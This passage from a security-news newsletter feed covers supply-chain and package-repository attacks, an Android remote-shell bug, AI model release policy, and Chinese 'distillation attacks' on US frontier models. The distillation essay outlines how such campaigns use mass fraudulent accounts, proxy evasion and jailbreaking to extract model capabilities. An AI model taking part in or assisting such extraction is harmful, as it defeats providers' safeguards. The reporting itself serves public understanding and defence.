gang&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/yDl-Ck_MqW8?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: The AI-first crime gang"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>RubyGems disables sign-ups after attack on staff:</strong> The RubyGems package repository has disabled new user sign-ups after a malicious attack on Monday targeted its engineers and staff.</p><p>Hundreds of malicious packages were published on <a href="https://x.com/maciejmensfeld/status/2053814200124752198"><u>Monday</u></a> and then again on <a href="https://x.com/maciejmensfeld/status/2054164602577940619"><u>Tuesday</u></a>.</p><p>The packages contained malicious code aimed at RubyGems developers. The code tried to execute cross-site scripting attacks and steal data from their systems.</p><p>[<a href="https://news.risky.biz/risky-bulletin-rubygems-disables-sign-ups-after-attack-on-staff/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>FCC relaxes foreign router ban to allow for security updates:</strong> The US Federal Communications Commission has updated its ban on foreign-made routers to allow vendors to ship security updates for a longer period of time.</p><p>The agency banned the sale of foreign routers <a href="https://www.fcc.gov/document/fcc-updates-covered-list-include-foreign-made-consumer-routers"><u>in March</u></a>, but allowed companies to ship security updates for one more year until March 2027.</p><p>The FCC says that based on comments from the government and private sector it has now <a href="https://www.fcc.gov/document/oet-announces-extension-and-expansion-waivers"><u>updated</u></a> this cutoff date to January 1, 2029.</p><p>The exemption applies only to security updates that &quot;mitigate harm to consumers&quot; and foreign companies are not allowed to ship new features via this mechanism.</p><p>[<a href="https://news.risky.biz/risky-bulletin-fcc-relaxes-foreign-router-ban-to-allow-for-security-updates/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Google patches Android remote takeover bug: </strong>This month&apos;s Android security updates carry an important patch for a critical vulnerability that can grant attackers remote access to an Android smartphone or smart device.</p><p>Tracked as CVE-2026-0073, the bug allows attackers to bypass authentication in the Android remote debugging service <a href="https://developer.android.com/tools/adb"><u>ADB</u></a>.</p><p>Successful exploitation opens a remote shell on a device where the ADB service was enabled. ADB is disabled by default in the standard Android OS release, but may be enabled and left exposed by accident by some OEM (device makers) during factory testing, which has happened a lot over the past years.</p><p>The issue impacts all devices running Android 11 or later, which is every Android version released since September 2020.</p><p>[<a href="https://news.risky.biz/risky-bulletin-google-patches-android-remote-takeover-bug/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  110. Srsly Risky Biz: After Mythos, US Government Weighs AI Model Regulation

    Thu, 07 May 2026 03:50:14 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://portswigger.net/"><em><u>PortSwigger</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/05/2026-05-07wolfgang-weiser-y_hd0LcAN8Q-unsplash.jpg" alt="Srsly Risky Biz: After Mythos, US Government Weighs AI Model Regulation"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://portswigger.net/"><em><u>PortSwigger</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://risky.biz/SRB166"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Srsly Risky Biz: After Mythos, US government weighs AI regulation - Risky Business Media</div><small><div class="kg-bookmark-description">Tom Uren and James Wilson talk about the sudden drive to put regulation around the releases of new AI models because of their cyber securi [Read More]</div></small></div></a></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/05/data-src-image-efb85db8-62f1-4661-a464-16c6a91b2726.jpeg" class="kg-image" alt="Srsly Risky Biz: After Mythos, US Government Weighs AI Model Regulation" loading="lazy" width="2000" height="1125" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/05/data-src-image-efb85db8-62f1-4661-a464-16c6a91b2726.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/05/data-src-image-efb85db8-62f1-4661-a464-16c6a91b2726.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/05/data-src-image-efb85db8-62f1-4661-a464-16c6a91b2726.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/05/data-src-image-efb85db8-62f1-4661-a464-16c6a91b2726.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@hamburgmeinefreundin?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Wolfgang Weiser</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/a-group-of-white-statues-in-a-building-y_hd0LcAN8Q?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>The Trump administration is considering applying stricter oversight to American AI models due to their cyber security impact. However, before pulling the trigger on strict and inflexible regulation, we believe the government should spend a little time watching and learning.</p><p>This apparent shift from the administration&apos;s <a href="https://www.cio.com/article/3806594/trump-repeals-bidens-ai-oversight-order-shifts-focus-to-innovation-driven-policies.html"><u>light touch AI regulation</u></a> has reportedly been driven by concern about the hacking capabilities of frontier models.&#xA0;</p><p><a href="https://www.nytimes.com/2026/05/04/technology/trump-ai-models.html"><u>According to the <em>New York Times</em></u></a>, the administration wants to establish a group made up of tech executives and government officials to propose oversight procedures for the roll out of all new AI models. The group is likely to consider a range of options, including a formal government review process.</p><p>Globally, cyber security authorities are already bracing for the impact of increasingly capable models. Last week, the UK&apos;s NCSC CTO Ollie Whitehouse <a href="https://www.ncsc.gov.uk/blogs/prepare-for-vulnerability-patch-wave"><u>warned of</u></a> an impending &quot;vulnerability patch wave&quot; as AI finds and fixes vulnerabilities that have accrued over decades.</p><p>CISA, meanwhile, is <a href="https://www.reuters.com/legal/litigation/us-officials-weigh-cutting-deadlines-fix-digital-flaws-amid-worries-over-ai-2026-05-01/"><u>considering</u></a> imposing shorter patch deadlines for US government systems. The default patch deadline for bugs that are being actively exploited could be reduced from three weeks to as little as three days. For what it&apos;s worth we think patching faster is a fine idea, but we also think organisations will get more bang for their buck by <a href="https://risky.biz/RB836/"><u>focusing on security fundamentals</u></a> that help to mitigate <em>all</em> bugs. You can&apos;t patch your way out of &quot;the bugpocalypse&quot;.</p><p>While Whitehouse describes a &quot;wave&quot; of patches, the reality is it will be waves, plural. Every time new models are released they will rapidly be used to discover more bugs in commonly used software with basic prompts. If that capability is available to all and sundry, it will cause problems. Anthropic and OpenAI are seemingly aware of this and have taken different approaches to mitigating these risks.</p><p>Anthropic released its latest model, Mythos Preview, to a limited number of trusted organisations, in its <a href="https://www.anthropic.com/glasswing"><u>Project Glasswing</u></a> initiative. The idea was to give these organisations a head start in finding and patching vulnerabilities before the model was rolled out more broadly. Mozilla reported that it had fixed 271 Firefox vulnerabilities after being granted access.&#xA0;</p><p>Unlike Anthropic, which restricted access to Mythos to a select few, OpenAI <a href="https://openai.com/index/introducing-gpt-5-5/"><u>released its latest model</u></a> GPT5.5 to all customers who wanted it and instead relied on <a href="https://deploymentsafety.openai.com/gpt-5-5/jailbreaks"><u>model safeguards</u></a> to prevent it from dangerously spilling 0day exploits. Users in cybersecurity roles who ran into these safeguards could verify their identity with OpenAI to get them dialled back.&#xA0;</p><p>This <a href="https://openai.com/index/scaling-trusted-access-for-cyber-defense/"><u>Trusted Access for Cyber</u></a> program provides users &quot;reduced friction around safeguards&quot; when individuals and enterprises are able to satisfy its <a href="https://chatgpt.com/cyber"><u>Know-Your-Customer and trust requirements</u></a>. Customers who prove that they are legitimate cyber defenders can also get access to more niche versions of OpenAI&apos;s models that have more advanced cyber capabilities coupled with fewer restrictions.&#xA0;</p><p>These are very different release approaches for models with similar capabilities. Anthropic&apos;s approach is very cautious, OpenAI&apos;s is more open.&#xA0;</p><p>The White House response so far has been to crack down on the cautious one. <em>The Wall Street Journal</em> <a href="https://www.wsj.com/tech/ai/white-house-opposes-anthropics-plan-to-expand-access-to-mythos-model-dc281ab5"><u>reported late last week</u></a> that the White House was opposing Anthropic&apos;s plan to expand access to Mythos to another 70 companies. There has been no such pronouncements about OpenAI&apos;s GPT5.5, which is funny when you consider that it is widely available and the UK&apos;s AI Security Institute (AISI) <a href="https://www.aisi.gov.uk/blog/our-evaluation-of-openais-gpt-5-5-cyber-capabilities"><u>found that</u></a> it might actually be <em>better</em> than Mythos at cyber security tasks.</p><p>We expect that the administration will eventually zero in on a position where AI companies have consistent release policies, rather than allowing each to make up their own rules.&#xA0;&#xA0;</p><p>It&#x2019;s not just frontier models that present risks here, though. Last week Niels Provos, a former Google Distinguished Engineer, <a href="https://www.provos.org/p/finding-zero-days-with-any-model/"><u>wrote</u></a> a blog post titled &quot;Finding Zero-Days With Any Model&quot;. He used an orchestration harness and older commercial and open weight models to independently rediscover bugs found by Mythos.&#xA0;</p><p>Provos proved that the vulnerability discovery gap between Mythos and GPT5.5 being driven by a novice and older models being driven by experts is not as big as it seems. Thus, holding back Mythos or GPT5.5 to a White House-approved circle of trust for 90 days probably won&apos;t achieve as much as we&apos;d like.</p><p>A better approach may be for the government to wait and see so that it can understand what is happening and can make informed decisions further down the track. How many 0day vulnerabilities does each new model release shake out? What are their CVSS scores? Is that number trending up or down over time? Are vendors actually patching the bugs? What is the state of vulnerability discovery using older and open weight models? Are the frontier labs acting responsibly?&#xA0;</p><p>The broader point here is that it is pretty clear that the rise of powerful AI cyber capabilities is a generational shift that policymakers don&apos;t yet understand how to respond to. Attempting to stagger the access to the technology&apos;s bleeding edge is intuitively attractive, but there are good reasons to believe that it will have little impact.&#xA0;</p><h2 id="australia-launches-hamstrung-cyber-review-board">Australia Launches Hamstrung Cyber Review Board</h2><p>This week Australia&apos;s Minister for Cyber Security, Tony Burke, <a href="https://minister.homeaffairs.gov.au/TonyBurke/Pages/cyber-incident-review-board-established.aspx"><u>announced the establishment</u></a> of a Cyber Incident Review Board. This is timely, especially given the rise of AI, but the board&apos;s impact will be limited by its approach to liability.&#xA0;</p><p>The Minister&apos;s press release says the board will conduct no-fault, post-incident reviews of significant cyber security incidents in Australia. The intent is to &quot;deliver actionable recommendations to government and industry to help prevent, detect, respond to, and minimise the impact of similar incidents in the future&quot;.&#xA0;</p><p><a href="https://www.legislation.gov.au/C2024A00098/asmade/text"><u>The implementing legislation</u></a>, the <em>Cyber Security Act 2024</em>, says that one criteria for reviewing an incident should be if it &quot;involved novel or complex methods or technologies, an understanding of which will significantly improve Australia&#x2019;s preparedness, resilience, or response to cyber security incidents of a similar nature&quot;.</p><p>Timely, given that the rise of AI will undoubtedly result in novel types of attacks.&#xA0;</p><p>Unfortunately the legislation states that the board must not apportion blame or provide the means to determine liability. This blunts the board&apos;s ability to point out that a serious security incident may have been downstream of a victim organisation making poor decisions and failing to prioritise security.&#xA0;</p><p>See, for example, the US Cyber Safety Review Board <a href="https://news.risky.biz/csrb-lashes-microsofts-cascade-of-security-failures/"><u>excoriating Microsoft</u></a> for a &quot;cascade of security failures&quot;. That report didn&apos;t pull its punches and shortly after it was released Microsoft CEO Satya Nadella <a href="https://news.risky.biz/microsoft-makes-security-the-new-black/"><u>issued an all-hands memo</u></a> declaring that security was the company&apos;s top priority. It also served as a warning to other companies that security was something they should care about.&#xA0;</p><p>The Australian version of that CSRB report? It can&apos;t apportion blame, so we&#x2019;re guessing it would say something like, &#x201C;Someone, somewhere made mistakes&#x201D;.</p><p>By contrast, the <a href="https://www.legislation.gov.au/C2004A01102/latest/text"><u>legislation for Australia&apos;s transport safety investigations</u></a> can apportion blame, while still maintaining liability protections: &quot;A report&#x2026; is not admissible in evidence in any civil or criminal proceedings.&quot;</p><p>This small change makes a huge difference to the ability of the Board to drive change and actually achieve its stated goals. We&apos;re pretty sure there will be a spate of upcoming incidents where the root cause is less technical and more greedy-executives-doing-dumb-stuff-with-AI without a passing thought about security. It would be a shame if the Board is not able to state that plainly.&#xA0;</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/dzzgslM8A7M?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: After Mythos, US government weighs AI regulation"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>US and China collaborate on Dubai scam center takedown:</strong> The coordinated takedown led to more than 270 arrests and dismantled nine scam centers that were being used in cryptocurrency investment scams. The takedowns involved what the Department of Justice <a href="https://www.justice.gov/opa/pr/coordinated-takedown-scam-centers-leads-least-276-arrests-alleged-managers-and-recruiters"><u>called &quot;unprecedented cooperation&quot;</u></a> between the FBI, the Chinese Ministry of Public Security and <a href="https://x.com/dubaipolicehq/status/2049526637327245424?s=46&amp;t=LHr1qUWpXBieorr8espjPA"><u>the Dubai Police</u></a>. <em>The Record</em> has <a href="https://therecord.media/us-china-partner-on-dubai-scam-compound-takedown"><u>further coverage</u></a>.&#xA0;&#xA0;</li><li><strong>Elections Canada watermarked electoral lists releases: </strong><em>Ars Technica</em> <a href="https://arstechnica.com/tech-policy/2026/05/in-canada-a-canary-trap-springs-shut-and-ids-election-database-leak/"><u>covers how</u></a> Elections Canada was able to trace the provenance of a leaked electoral list because it inserts bogus data as a form of fingerprinting into the lists it distributes to legitimate recipients. We&apos;d call this a type of watermark, but Ars uses the term &apos;canary trap&apos; and we like the clever use of a simple technique.&#xA0;&#xA0;</li><li><strong>FTC bans data broker sensitive data sales:</strong> The data broker Kochava and the US Federal Trade Commission have agreed to settle a complaint in which the FTC alleged that Kochava was selling the precise geolocation of customers without consent. This included sensitive locations including places of worship and health care clinics. There was no fine, but Kochava has agreed to stop sharing or selling sensitive location data. <em>The Record </em>has <a href="https://therecord.media/ftc-bans-kochava-location-data-sales"><u>further coverage</u></a>.</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, James Wilson talks with James Kettle and Daf Stuttard from PortSwigger about the incredible research James will unveil at Black Hat US this July, and how that research will be productised into Burp Suite.</em></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://risky.biz/RBNEWSSI126/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Sponsored: James Kettle built an AI hacker - Risky Business Media</div><small><div class="kg-bookmark-description">In this sponsored interview, James Wilson talks with James Kettle and Daf Stuttard from PortSwigger about the incredible research James wi [Read More]</div></small></div></a></figure><h2 id="shorts">Shorts</h2><h3 id="googles-vulnerability-reward-programs-change-because-ai">Google&apos;s Vulnerability Reward Programs Change Because AI</h3><p>Google has <a href="https://bughunters.google.com/blog/evolving-the-android-chrome-vrps-for-the-ai-era"><u>announced changes</u></a> to its vulnerability reward programs that reflect the impact AI is having on bug discovery and remediation. The program now rewards reports that are impactful <em>and</em> also hard for automated AI tooling to find. For example, a full chain Pixel Titan M2 compromise with persistence pays up to USD$1.5 million. But other rewards are going to be reduced. Also, bug reports now don&apos;t really need words, as much as some sort of &quot;concrete proof of exploitability&quot; and, ideally, proposed patches.</p><h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em>&#xA0; discuss the breakdown of cyber norms. What would have been an unthinkable cyber operation just a few years ago is now a regular occurrence.</em></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://risky.biz/BTN165/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Between Two Nerds: The wild wild west - Risky Business Media</div><small><div class="kg-bookmark-description">In this edition of Between Two Nerds Tom Uren and The Grugq discuss the breakdown of cyber norms. What would have been an unthinkable cybe [Read More]</div></small></div></a></figure><p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/1WJKwi57jcQ?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: The wild wild west"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>Extremely targeted supply chain attack hits DAEMON Tools: </strong>A supply chain attack is currently ongoing on the website of <a href="https://www.daemon-tools.cc/downloads"><u>DAEMON Tools</u></a>, a popular app for burning CDs and DVDs, and for creating bootable USB drives.</p><p>DAEMON Tools installers have been shipping with a backdoor since at least April 8. The installers were signed with the vendor&apos;s legitimate certificate, suggesting deep access to the AVB Disc Soft&apos;s internal network and processes.</p><p>The backdoor triggers every time the user runs their PC, collects data about the host, and uploads it to a remote server. Collected data includes the machine&apos;s MAC address, hostname, system locale, DNS domain name, and a list of active processes and installed software.</p><p>[<a href="https://news.risky.biz/risky-bulletin-extremely-targeted-supply-chain-attack-hits-daemon-tools/"><u>more</u></a> on Risky Bulletin]</p><p><strong>DigiCert hacked with a malicious screensaver file: </strong>A threat actor gained access to DigiCert&apos;s backend and stole 27 code signing certificates they later used to sign malware.</p><p>The incident took place last month and was traced back to a social engineering attack that successfully compromised two employees of DigiCert&apos;s tech support team.</p><p>According to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033170"><u>DigiCert&apos;s post-mortem</u></a>, the attacker posed as a customer and tricked the tech support staff into running an SCR file, a format used to install and configure Windows screensavers.</p><p>[<a href="https://news.risky.biz/risky-bulletin-digicert-hacked-with-a-malicious-screensaver-file/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>The mysterious hack of Moldova&apos;s healthcare database: </strong>A mysterious hacking group has stolen the personal and financial information of Moldovan citizens from the country&apos;s national healthcare database.</p><p>Moldova&apos;s national health insurance agency, CNAM, <a href="https://cnam.md/9112/precizarile-cnam-cu-privire-la-informatiile-despre-un-atac-cibernetic/"><u>confirmed</u></a> that data was stolen but denied <a href="https://tvrmoldova.md/article/38e53cd804217aa4/30-din-date-afectate-sistemul-medical-al-r-moldova-a-fost-supus-unui-atac-cibernetic-masiv.html"><u>initial</u></a> <a href="https://noi.md/md/societate/atac-cibernetic-de-amploare-asupra-unei-baze-de-date-din-tara"><u>news</u></a> <a href="https://www.descopera.ro/stiinta/21005921-atac-cibernetic-masiv-la-agentia-spatiala-europeana-ce-au-transmis-oficialii-esa"><u>reports</u></a> that almost a third of the database had been destroyed in the attack.</p><p>Ion Vintil&#x103;, an adjunct director for Moldova&apos;s Cybersecurity Agency, had told reporters in a taped interview that almost 30% of the agency&apos;s data was impacted in the incident, but didn&apos;t specify in what manner.</p><p>[<a href="https://news.risky.biz/risky-bulletin-the-mysterious-hack-of-moldovas-healthcare-database/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  111. Srsly Risky Biz: US Vows to Fight Distillation Attacks

    Thu, 30 Apr 2026 03:39:59 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://www.runzero.com/"><em><u>runZero</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/04/2026-04-30possessed-photography-_E1PQXKUkMw-unsplash.jpg" alt="Srsly Risky Biz: US Vows to Fight Distillation Attacks"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://www.runzero.com/"><em><u>runZero</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://risky.biz/SRB165/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Srsly Risky Biz: US Vows to Fight Distillation Attacks - Risky Business Media</div><small><div class="kg-bookmark-description">Tom Uren and Amberleigh Jack talk about the US government stepping in to fight &#x2018;distillation attacks&#x2019; by Chinese AI labs. These are method [Read More]</div></small></div></a></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/04/data-src-image-1716c602-9449-45ab-a78c-dee3762e238f.jpeg" class="kg-image" alt="Srsly Risky Biz: US Vows to Fight Distillation Attacks" loading="lazy" width="2000" height="1330" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/04/data-src-image-1716c602-9449-45ab-a78c-dee3762e238f.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/04/data-src-image-1716c602-9449-45ab-a78c-dee3762e238f.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/04/data-src-image-1716c602-9449-45ab-a78c-dee3762e238f.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/04/data-src-image-1716c602-9449-45ab-a78c-dee3762e238f.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@possessedphotography?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Possessed Photography</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/white-arrow-lot-_E1PQXKUkMw?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>The US government has committed to countering Chinese &apos;distillation attacks&apos; which are being used to steal the proprietary capabilities of American frontier AI models. We love a little governmental fist-shaking, but we don&apos;t think its plan will have China&apos;s AI labs shaking in their boots.&#xA0;</p><p>Distillation attacks, also known as model extraction attacks, upskill less capable models on the cheap by training them on the outputs of more advanced models.&#xA0;</p><p>Back in February, <a href="https://assets.bwbx.io/documents/users/iqjWHBFdfxIU/rRmql_jJcxb4/v0"><u>OpenAI</u></a>, <a href="https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"><u>Google</u></a> and <a href="https://www.anthropic.com/news/detecting-and-preventing-distillation-attacks"><u>Anthropic</u></a> each said that they had been victims of distillation attacks. Anthropic said that Chinese labs had collectively generated &quot;16 million exchanges&quot; with Claude, across 24,000 fraudulent accounts. Google cited an attack that involved 100,000 queries to Gemini.&#xA0;</p><p>Last week, a <a href="https://whitehouse.gov/wp-content/uploads/2026/04/NSTM-4.pdf"><u>memo released by</u></a> the White House acknowledged the problem:</p><blockquote>&#x2026;foreign entities, principally based in China, are engaged in deliberate, industrial-scale campaigns to distill US frontier AI systems. Leveraging tens of thousands of proxy accounts to evade detection and using jailbreaking techniques to expose proprietary information, these coordinated campaigns systematically extract capabilities from American AI models, exploiting American expertise and innovation.</blockquote><p>The memo also promised action. It&apos;s great to get a rapid response from the government, but when it comes to the specific actions the administration has committed to we are, sadly, underwhelmed.</p><p>According to the memo the administration will: Share information about distillation attacks; enable private sector coordination against attacks; facilitate development of best practices to &quot;identify, mitigate, and remediate&quot; distillation attacks and &quot;explore a range of measures&quot; to hold actors accountable.&#xA0;</p><p>These feel an awful lot like the ineffective measures the US government used throughout China&apos;s 20 years of IP theft.&#xA0;&#xA0;</p><p>But wait, it&apos;s not <em>just</em> information sharing, coordination and best practices&#x2026; We have a strongly worded letter to add to the mix as well!</p><p><em>Reuters </em><a href="https://www.reuters.com/world/china/us-state-dept-orders-global-warning-about-alleged-china-ai-thefts-by-deepseek-2026-04-24/"><u>reported</u></a> the State Department has cabled diplomatic posts and directed them to raise &quot;concerns over adversaries&apos; extraction and distillation of US AI models&quot; in their host countries. The cable also said that a &quot;demarche &#x200B;request and message has been sent to Beijing&quot;. That demarche is a formal raising of concerns with the Chinese government.</p><p>In response,&#xA0; the Chinese embassy in Washington <a href="https://www.ft.com/content/abde4e1e-c69a-4cc4-ad96-d88308314298"><u>said the</u></a> White House&apos;s accusations of AI intellectual property theft were &quot;pure slander&quot;. We&apos;re shocked, too.</p><p>To be fair, the Trump administration&apos;s promised actions <em>are</em> reasonable and will make <em>some</em> difference. But they won&apos;t stop Chinese distillation attacks. The technology is such a game changer that China&apos;s AI labs will be fully committed to overcoming the US government&apos;s countermeasures.&#xA0;</p><p>The disappointing thing about the memo is that it made no mention of strengthening the most effective tool the US government has: <a href="https://www.congress.gov/crs-product/R48642"><u>semiconductor export restrictions</u></a>.&#xA0;</p><p>There is already evidence that chip export restrictions are hampering the development of Chinese models. The release of Chinese AI company DeepSeek&apos;s <a href="https://techcrunch.com/2026/04/24/deepseek-previews-new-ai-model-that-closes-the-gap-with-frontier-models/"><u>latest V4 model</u></a> was significantly delayed because it <a href="https://techcrunch.com/2026/04/24/deepseek-previews-new-ai-model-that-closes-the-gap-with-frontier-models/"><u>unsuccessfully tried to train</u></a> the model on Huawei&apos;s Ascend processor. DeepSeek eventually reverted to using chips from American company Nvidia to train the model. This was possible despite restrictions because Chinese companies do have access to older chips, plus&#x2026; export restrictions have been leaky. DeepSeek is using Huawei chips to actually run the model to answer queries, a process known as <a href="https://cloud.google.com/discover/what-is-ai-inference"><u>inference</u></a>.</p><p>Additionally, a <a href="https://www.chinatalk.media/p/deepseek-v4"><u>Chinese tech blogger reported</u></a> that &quot;constraints on computing power and cash&quot; is why DeepSeek V4 is a text-only model rather than being <a href="https://www.ibm.com/think/topics/multimodal-ai"><u>multimodal</u></a>. In its V4 <a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro/blob/main/DeepSeek_V4.pdf"><u>technical report</u></a> DeepSeek itself says the model &quot;trails state-of-the-art frontier models by approximately three to six months&quot;.&#xA0;</p><p>Huawei&apos;s Ascend can theoretically be produced by Chinese firms, but historically the bulk of Ascend production has <a href="https://newsletter.semianalysis.com/p/huawei-ai-cloudmatrix-384-chinas-answer-to-nvidia-gb200-nvl72"><u>occurred in Taiwan</u></a> in violation of sanctions. Ascend chips are not as performant as Nvidia&apos;s leading chips and, at least so far, Chinese firms cannot produce as many chips as Nvidia.&#xA0;</p><p>Suffice it to say that export controls are complementary to measures that counter distillation attacks. They must be part of the solution to maintaining America&apos;s AI advantage. Leading AI firms have also <a href="https://www.anthropic.com/news/securing-america-s-compute-advantage-anthropic-s-position-on-the-diffusion-rule"><u>argued for stronger export controls</u></a>. It was counterproductive to <a href="https://www.semafor.com/article/12/09/2025/trump-says-nvidia-can-sell-h200-ai-chips-to-china"><u>loosen controls</u></a> when access to chips is the only structural advantage that the US has in the AI technology race.&#xA0;&#xA0;</p><p>There may be good political reasons export restrictions were not mentioned in the White House&apos;s memo. In just over two weeks, 